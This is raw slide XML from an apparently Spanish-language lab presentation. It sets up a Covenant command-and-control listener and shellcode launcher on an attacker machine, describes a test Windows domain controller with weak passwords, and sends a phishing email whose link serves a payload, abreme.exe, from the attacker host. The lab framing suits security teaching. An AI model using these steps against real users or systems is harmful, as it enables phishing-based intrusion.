            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="160421"/>
            <a:ext cx="11290077" cy="6513095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F534AB-27F4-FB75-C57D-CA5F666A9E1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5980" y="2069147"/>
            <a:ext cx="5400040" cy="2719705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1913530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FE6C363-6CF5-8342-88C7-480977262AE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="417095"/>
            <a:ext cx="11065487" cy="6079958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El primer paso cuando entramos en la aplicación es crear un oyente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora tendremos que configurar un oyente, los oyentes permiten que los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Grunts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> se comuniquen con la aplicación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. No hay ningún oyente configurado por defecto, por lo que deberemos configurar uno,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para esto habrá que hacer clic en oyentes en el menú de la izquierda para abrir la página de oyentes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FFEE0B8-F471-241E-1ED9-8A611F773B6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18002" y="2810443"/>
            <a:ext cx="4865703" cy="3879115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213349041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0C634D9-955B-6449-AF11-E8588231F8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="352927"/>
            <a:ext cx="11129655" cy="6240378"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora crearemos uno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tendremos que cambiar alguno de los valores proporcionados:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nombre: de forma predeterminada, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> proporciona un nombre de tipo “GUID” simple. Lo cambiaremos a Luno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>BindAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>ConnectAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Pondremos la IP de nuestra máquina atacante que es 192.168.1.44 y el puerto será el 80.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>UseSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: sería para usar el SSL, se deberá especificar un archivo de certificado SSL y una contraseña.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C63C2B8-9412-3503-70DB-0678DEA6694D}"/>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41243" y="3288346"/>
            <a:ext cx="4865705" cy="2719705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36F2D34-490C-0141-46CA-0A42774ECA5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85846" y="3288346"/>
            <a:ext cx="4921142" cy="2719705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2463643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7CDDB24-A808-0D78-09D2-B4AAACFD86B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="256675"/>
            <a:ext cx="11113613" cy="6304546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>A continuación tendremos que crear un lanzador. Los lanzadores se utilizan para convertir los hosts remotos en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>grunts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y conectarlos a la aplicación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Por lo general, vienen en forma de paquete de carga útil que se ejecuta en un host remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cada lanzador esta emparejado a un oyente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Elegiremos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A1D914-99AF-1700-92EA-3CD540F92D3D}"/>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01959" y="2710246"/>
            <a:ext cx="5400040" cy="3891079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23230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57C8FD-EF2F-FD9A-BB58-6C8DFC32C632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="352927"/>
            <a:ext cx="8596668" cy="5688436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows Server 2019 DC02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuración:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El equipo será Administrador del dominio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>google.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuraremos una entidad certificadora en este dominio, instalando los servicios de certificados de Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuraremos el escritorio remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Usuarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se creará un usuario Administrador del dominio con el nombre Administrador y contraseña abc123.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se creará un usuario normal sin permisos llamado Alesander y con contraseña abc123.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="546653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D317285C-5EC7-261B-FBAA-62F30151E58E}"/>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3837405" y="1488281"/>
            <a:ext cx="3881437" cy="3881437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3814861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1D378D-B183-36F6-4D99-8037A1546254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ataque</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Marcador de contenido 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3A6495-4567-4EBC-FA07-64C694AF53F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="1749448"/>
            <a:ext cx="10836275" cy="4410029"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619359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B1FC039-9A5B-FAF9-1897-3635F089B37F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="683064"/>
            <a:ext cx="11080750" cy="5580773"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="844833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BAD4724-06AF-36E5-9737-5DA9DE3B484F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="706992"/>
            <a:ext cx="11017250" cy="5548792"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1604353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3941C80-09FD-87C1-21C3-05AF81782C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="678435"/>
            <a:ext cx="11225212" cy="5653531"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="897260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E7DBC1F4-9A38-ABAD-465B-EE45777664E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="751308"/>
            <a:ext cx="10872787" cy="5476034"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1253868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DC264-4020-E1B6-424A-A085E3CA9638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="449179"/>
            <a:ext cx="11193824" cy="6096000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para realizar el ataque de phishing usaré la aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>PhisMailer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, que ejecutaremos con python3 PhisMailer.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633A2444-A8E8-ADA2-B0CC-EEB0058F310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01959" y="1715803"/>
            <a:ext cx="5400040" cy="4164330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547024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C8EBC6-5164-2C7F-8884-9D341D554245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645249" y="476168"/>
            <a:ext cx="11161739" cy="5908590"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora crearé el correo electrónico que enviaremos con la aplicación antes mencionada:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cambiaré esta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> por la dirección del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Grunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>http://192.168.1.44/abreme.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C930E3-8345-A93C-8036-A2AD1AB8B1E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18001" y="1838124"/>
            <a:ext cx="5400040" cy="1192530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E589DA6E-4BC0-7F7F-6A9A-FDEB13A6E27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18001" y="4591467"/>
            <a:ext cx="5400040" cy="1108075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3304691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1E13F97-1491-5C12-1CC7-0B7A0A0504AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="449179"/>
            <a:ext cx="11081529" cy="6079958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Y enviaremos el correo con la aplicación:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715405AF-0490-CE05-2D49-196A9C534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917" y="1594000"/>
            <a:ext cx="6447155" cy="3790315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37697283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18DE2D-ECDC-A326-D21D-6A8A2641DBD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="385011"/>
            <a:ext cx="11049445" cy="6224336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60924C95-0407-7A87-E586-700191484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980" y="798830"/>
            <a:ext cx="5400040" cy="5260340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
